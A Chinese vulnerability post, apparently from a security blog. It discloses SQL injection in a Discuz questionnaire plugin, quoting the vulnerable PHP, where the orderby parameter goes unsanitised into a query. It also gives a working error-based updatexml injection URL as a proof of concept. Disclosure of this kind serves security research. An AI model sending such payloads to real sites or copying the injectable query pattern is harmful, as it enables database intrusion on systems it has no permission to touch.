Discuz问卷调查专业版插件注入

  • A+
所属分类:漏洞时代
摘要

nds_ques_viewanswer.inc.php测试方式:

nds_ques_viewanswer.inc.php

<?PHP  if(!defined('IN_DISCUZ')) {         exit('Access Denied'); }    !empty($_G['gp_srchtxt'])? $wherestr .= " AND  author = '".dhtmlspecialchars(trim(substr($_GET['srchtxt'],0,20)))."' " :'' ;     $orderby = $_G['gp_orderby']? $_G['gp_orderby']:'dateline';//获取参数     $imes = $_G['gp_imes']? $_G['gp_imes']:'DESC';     $questopics = DB::fetch_first("SELECT * FROM ".DB::table('ques_topic')." WHERE `topicid`='$topicid'");     $sysmode = $questopics['ques_mode'];            ....                 $magiccount =  DB::result(DB::query("SELECT COUNT(*) FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' LIMIT 1"), 0);                    $multipage = multi($magiccount, $perpage, $page, "plugin.php?id=nds_up_ques:nds_up_ques&action=viewanswer&topicid=".$topicid."&orderby=".$orderby."&imes=".$imes);                 $topiclist = '';                 $nid = $start_limit+1;         $query = DB::query(" SELECT * FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' ".$wherestr."  ORDER by $orderby $imes LIMIT $start_limit,$perpage");//带入查询 ....  ?>

测试方式:

/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--

Discuz问卷调查专业版插件注入

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: